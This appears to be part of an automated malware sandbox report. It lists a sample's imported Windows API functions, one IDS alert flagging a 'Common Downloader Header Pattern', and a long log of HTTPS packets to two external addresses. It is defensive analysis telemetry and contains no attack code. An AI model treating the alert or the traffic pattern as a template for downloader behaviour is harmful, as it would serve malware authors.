USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T03:08:50.343581+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49985	216.58.206.78	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:08:49.147022963 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:49.147075891 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:49.147161007 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:49.205487967 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:49.205518007 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:49.872129917 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:49.872711897 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:49.872881889 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:49.875696898 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:50.026168108 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:50.026254892 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:50.026699066 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:50.027117014 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:50.043694019 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:50.087335110 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:50.343492985 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:50.344754934 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:50.348098040 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:50.358151913 CET	49985	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:50.358182907 CET	443	49985	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:50.440367937 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:50.440466881 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:50.440609932 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:50.441063881 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:50.441086054 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.075398922 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.075476885 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.079320908 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.079332113 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.079598904 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.079653978 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.080066919 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.123328924 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.615669966 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.615732908 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.615781069 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.615797997 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.615813017 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.615817070 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.615869045 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.635293961 CET	49986	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:51.635323048 CET	443	49986	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:51.811676025 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:51.811738014 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:51.811839104 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:51.812099934 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:51.812117100 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:52.461827040 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:52.463742971 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:52.464412928 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:52.464421034 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:52.464598894 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:52.464605093 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:52.852792978 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:52.852870941 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:52.852900028 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:52.852943897 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:52.852998972 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:52.853034019 CET	443	49987	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:52.853081942 CET	49987	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:52.864311934 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:52.864355087 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:52.864425898 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:52.864742994 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:52.864758968 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.498402119 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.498483896 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.498946905 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.498955965 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.499119043 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.499125004 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.825653076 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.825737953 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.825740099 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.825757027 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.825800896 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.825822115 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.825844049 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.825869083 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.825931072 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.826715946 CET	49988	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:53.826739073 CET	443	49988	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:53.952064037 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:53.952107906 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:53.952193975 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:53.952469110 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:53.952485085 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:54.609008074 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:54.609091043 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:54.609805107 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:54.609863043 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:54.611650944 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:54.611660957 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:54.611938000 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:54.611993074 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:54.612343073 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:54.655332088 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:55.004384995 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:55.004580975 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:55.004611015 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:55.004668951 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:55.004713058 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:55.004756927 CET	443	49989	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:55.004812002 CET	49989	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:55.021114111 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:55.021155119 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:55.021316051 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:55.021579981 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:55.021589041 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:55.652781010 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:55.652888060 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:55.667814016 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:55.667825937 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:55.667980909 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:55.667985916 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:56.075964928 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:56.076035976 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.076040030 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:56.076054096 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:56.076081038 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.076121092 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.076131105 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:56.076153040 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:56.076174021 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.076191902 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.076735020 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.076751947 CET	443	49990	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:56.076762915 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.076802969 CET	49990	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:56.196901083 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.196957111 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:56.197074890 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.197357893 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.197371960 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:56.859186888 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:56.859272957 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.859966040 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:56.860014915 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.863765955 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.863774061 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:56.864031076 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:56.864239931 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.864417076 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:56.907330990 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:57.251347065 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:57.251434088 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:57.251446009 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:57.251503944 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:57.251653910 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:57.251669884 CET	443	49991	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:57.251683950 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:57.251722097 CET	49991	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:57.261401892 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:57.261455059 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:57.261534929 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:57.261748075 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:57.261758089 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:57.931245089 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:57.931389093 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:57.931868076 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:57.931875944 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:57.932046890 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:57.932050943 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:58.351548910 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:58.351591110 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:58.351718903 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:58.351736069 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:58.351835966 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:58.351877928 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:58.351927042 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:58.351958990 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:58.352020979 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:58.353885889 CET	49992	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:58.353897095 CET	443	49992	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:58.486656904 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:58.486701012 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:58.486856937 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:58.487286091 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:58.487302065 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.144260883 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.144341946 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.144845009 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.144850969 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.145020962 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.145025015 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.535804987 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.535898924 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.535926104 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.535972118 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.535979986 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.536031008 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.536113024 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.536128044 CET	443	49993	216.58.206.78	192.168.2.6
Jan 11, 2025 03:08:59.536138058 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.536173105 CET	49993	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:08:59.543641090 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:59.543730021 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:08:59.543838978 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:59.544171095 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:08:59.544193983 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.207380056 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.207485914 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:00.207984924 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:00.208004951 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.208137989 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:00.208149910 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.621531963 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.621570110 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.621712923 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:00.621737957 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.621751070 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.621809959 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:00.622668028 CET	49994	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:00.622684002 CET	443	49994	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:00.749202967 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:00.749304056 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:00.749418974 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:00.749766111 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:00.749802113 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:01.397046089 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:01.397201061 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:01.397866011 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:01.397876024 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:01.398056030 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:01.398061991 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:01.779814005 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:01.779918909 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:01.779983997 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:01.780055046 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:01.780108929 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:01.780164957 CET	443	49995	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:01.780225039 CET	49995	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:01.796082020 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:01.796129942 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:01.796262026 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:01.796406031 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:01.796415091 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.435813904 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.435892105 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.438671112 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.438678026 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.438853979 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.438858986 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.854504108 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.854571104 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.854588985 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.854613066 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.854625940 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.854629040 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:02.854669094 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.854701996 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.862993956 CET	49997	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:02.863012075 CET	443	49997	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:03.041419983 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.041482925 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:03.041614056 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.041820049 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.041842937 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:03.782749891 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:03.782967091 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.783519030 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:03.783586979 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.785159111 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.785173893 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:03.785413027 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:03.785470009 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.785865068 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:03.827330112 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:04.163738012 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:04.163804054 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:04.163822889 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:04.163867950 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:04.164073944 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:04.164114952 CET	443	49998	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:04.164163113 CET	49998	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:04.178920031 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:04.178971052 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:04.179039955 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:04.179299116 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:04.179322004 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:04.819715977 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:04.819874048 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:04.820341110 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:04.820365906 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:04.820395947 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:04.820414066 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:05.268964052 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:05.269032955 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:05.269094944 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:05.269140959 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:05.269246101 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:05.269799948 CET	49999	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:05.269817114 CET	443	49999	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:05.390434980 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:05.390491962 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:05.390571117 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:05.390824080 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:05.390839100 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.165267944 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.165429115 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.166068077 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.166131020 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.326205015 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.326247931 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.326690912 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.326745033 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.327567101 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.371331930 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.625097990 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.625158072 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.625207901 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.625451088 CET	50000	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:06.625502110 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.625680923 CET	443	50000	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:06.625730038 CET	50000	443	192.168.2.6	216.58.206.78
